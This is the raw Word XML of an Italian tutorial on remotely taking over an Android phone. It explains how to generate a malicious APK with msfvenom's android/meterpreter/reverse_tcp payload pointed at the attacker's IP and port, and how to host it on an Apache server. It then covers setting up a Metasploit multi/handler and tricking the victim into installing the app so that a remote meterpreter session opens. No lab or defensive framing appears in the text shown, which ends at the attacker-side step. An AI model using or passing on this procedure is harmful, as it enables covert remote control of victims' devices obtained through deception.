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2DF87" w14:textId="499ED1B7" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00261FE8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sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk62640147"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PRENDERE IL CONTROLLO DI UN DISPOSITIVO ANDROID DA REMOTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367DC126" w14:textId="1167983D" w:rsid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lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147A424C" w14:textId="6A4D3608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b/>
          <w:bCs/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Obiettivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizzare Kali Linux per entrare nel sistem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> di uno smartphone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Android</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314E0A45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291F9119" w14:textId="4A71663C" w:rsid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  <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Descrizione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6BE662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3B0E3E94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 xml:space="preserve">Utilizzeremo </w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>mfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per creare un </w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>payload.apk.</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nell'esecuzione della generazione di un payload, dovremo inquadrare un ascoltatore nel framework Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C838D15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Dobbiamo quindi ingannare la vittima in modo che sia convinta di scaricare quel payload o il file ".apk" generato in precedenza.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC825E3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Una volta che il file viene installato sul dispositivo della vittima, avremo la possibilità di accedere alla sessione creata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12624557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5F0AE635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b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Generazione del carico utile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402E63A8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4EB20D28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Per eseguire l'attacco con successo è necessario in primo luogo generare il file malevolo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAF8B4E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2C7FE5A9" w14:textId="2C1747B1" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00C232A0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="594D61D1" wp14:editId="56704516">
            <wp:extent cx="4572000" cy="998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A5252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5854EA08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Qui:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA3115E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26DE2289" w14:textId="1D9BC2CF" w:rsidR="00261FE8" w:rsidRPr="00C232A0" w:rsidRDefault="00261FE8" w:rsidP="00C232A0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entury Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C232A0">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r w:rsidRPr="00C232A0">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT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US" w:eastAsia="it-IT"/>
          </w:rPr>
          <m:t>⟶</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00C232A0">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostra il tipo di payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF9E03" w14:textId="77777777" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00C232A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="center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i/>
          <w:iCs/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>android/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT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US" w:eastAsia="it-IT"/>
          </w:rPr>
          <m:t>⟶</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> indica che una shell meterpreter verrà avviata una volta stabilita la connessione con il dispositivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BDB46D" w14:textId="77777777" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00C232A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT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US" w:eastAsia="it-IT"/>
          </w:rPr>
          <m:t>⟶</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> l'ip della macchina attaccante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BFA38C" w14:textId="77777777" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00C232A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="center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i/>
          <w:iCs/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT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US" w:eastAsia="it-IT"/>
          </w:rPr>
          <m:t>⟶</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> porta di ascolto della macchina attaccante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F2058D" w14:textId="695C4FB3" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00C232A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="center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i/>
          <w:iCs/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>R&gt; /var/www/</w:t>
      </w:r>
      <w:r w:rsidR="00F4794E">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>html/</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>androidhack.apk</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT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US" w:eastAsia="it-IT"/>
          </w:rPr>
          <m:t>⟶</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="00C232A0" w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C232A0">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>enera il payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041C11DE" w14:textId="77777777" w:rsidR="00C232A0" w:rsidRDefault="00C232A0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023AB222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7570B847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285CADF1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6ED31A7B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6169B275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4D0A5BA1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7A709EA5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3786BF05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0517D330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66815B6A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1B4E4EB1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4180A275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3D70B4CF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2E81F862" w14:textId="7EE54ABA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b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Preparazione dell'attacco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B229D78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38F0CF64" w14:textId="7E633737" w:rsid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Inanzitutto, dobbiamo controllare lo stato del nostro server Apache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4A3789" w14:textId="77777777" w:rsidR="00C1630C" w:rsidRPr="00261FE8" w:rsidRDefault="00C1630C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</w:p>
    <w:p w14:paraId="09511010" w14:textId="79F44218" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00C232A0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08AE76C8" wp14:editId="1BE4E10A">
            <wp:extent cx="3520442" cy="2317623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58" cy="23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1FC66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499C8C94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Così facendo possiamo utilizzare questo Web Server per ospitare il nostro file ".apk".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C9D419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7ADA7DBF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 xml:space="preserve">Ora, sembra che tutto sia impostato correttamente e possiamo avviare </w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>msfconsole.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B171135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2EFBEBCE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Utilizzando la funzione multi/handler andiamo a settare il payload che avevamo generato in precedenza:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1192179A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2CA039A6" w14:textId="655D2ADD" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00C232A0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="280F97B2" wp14:editId="1B5D4CEF">
            <wp:extent cx="4572000" cy="464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72D1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6CD189C6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 xml:space="preserve">Ora che abbiamo caricato il payload, dobbiamo controllare che la configurazione del multi/handler sia corretta, digitiamo quindi il comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9F6691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272EA969" w14:textId="467F70FD" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00C232A0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="793B549D" wp14:editId="199AACBF">
            <wp:extent cx="3520440" cy="1936242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781" cy="19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E7BA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3D960FFE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</w:p>
    <w:p w14:paraId="5F0040EA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</w:p>
    <w:p w14:paraId="20EB7FAD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</w:p>
    <w:p w14:paraId="7D37A874" w14:textId="27C7393C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lastRenderedPageBreak/>
        <w:t>Come possiamo notare LPORT è settato correttamente, mentre LHOST è vuoto. Sarà quindi necessario andare a modificare il valore di LHOST con il comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B465AD5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35177E69" w14:textId="7D59A559" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00C232A0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7429F9C7" wp14:editId="60B7919A">
            <wp:extent cx="422910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6499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3D753559" w14:textId="735B10F9" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00C232A0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0960331E" wp14:editId="41408578">
            <wp:extent cx="4214980" cy="2009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846" cy="201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6329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28C4EED8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Come possiamo notare, ora LHOST è stato settato correttamente, possiamo quindi procedere a lanciare l'attacco:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260B8ADE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23DB3B8B" w14:textId="634D1B31" w:rsidR="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00C232A0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A95C80F" wp14:editId="68D4E47A">
            <wp:extent cx="457200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91566" w14:textId="77777777" w:rsidR="00C232A0" w:rsidRPr="00261FE8" w:rsidRDefault="00C232A0" w:rsidP="00C232A0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C88159E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7BB22B3B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b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Esecuzione dell'attacco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3178A8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3D38B3F5" w14:textId="77777777" w:rsidR="00C232A0" w:rsidRDefault="00C232A0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6DEEB98B" w14:textId="019B487E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b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Lato vittima:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A50F4B7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0EC90DFD" w14:textId="7CD5FE97" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00F4794E" w:rsidP="00261FE8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entury Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>Una volta digitato</w:t>
      </w:r>
      <w:r w:rsidR="00261FE8" w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00261FE8" w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>"ip_macchinaAttaccante/nomefile.apk"</w:t>
      </w:r>
      <w:r w:rsidR="00261FE8" w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>dal</w:t>
      </w:r>
      <w:r w:rsidR="00261FE8" w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>browser</w:t>
      </w:r>
      <w:r w:rsidR="00261FE8" w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> della vittima</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>, verrà automaticamente scaricato il payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522A5FFA" w14:textId="77777777" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00261FE8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Dopo aver scaricato con successo il payload, installarlo sul dispositivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB0D515" w14:textId="3894CFFB" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00261FE8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Abilitare le impostazioni per introdurre applica</w:t>
      </w:r>
      <w:r w:rsidR="00F4794E">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>ioni da fonti esterne</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EB699D" w14:textId="48C70ED6" w:rsidR="00261FE8" w:rsidRPr="00261FE8" w:rsidRDefault="00261FE8" w:rsidP="00261FE8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Una volta che la vittima installa e apre l'applicazione</w:t>
      </w:r>
      <w:r w:rsidR="00F4794E">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">viene </w:t>
      </w:r>
      <w:r w:rsidR="00F4794E">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t>lanciata</w:t>
      </w:r>
      <w:r w:rsidRPr="00261FE8">
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsia="Times New Roman" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> immediatamente una sessione meterpreter sul nostro terminale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7E30EF" w14:textId="3880EDEC" w:rsidR="00C232A0" w:rsidRPr="00C1630C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0CC15985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7A01DDCD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027743F3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3D9B169C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1F3B5306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3525F8FF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5B66C854" w14:textId="77777777" w:rsidR="00C1630C" w:rsidRDefault="00C1630C" w:rsidP="00261FE8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53F259C1" w14:textId="11202206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b/>
          <w:bCs/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lato attaccante:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136A16B0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3FDABEFB" w14:textId="345A079E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 xml:space="preserve">Una volta che la vittima ha aperto l'applicazione, sul terminale della macchina attaccante si aprirà automaticamente una lista delle sessioni </w:t>
      </w:r>
      <w:r w:rsidR="00C96FDA">
        <w:rPr>
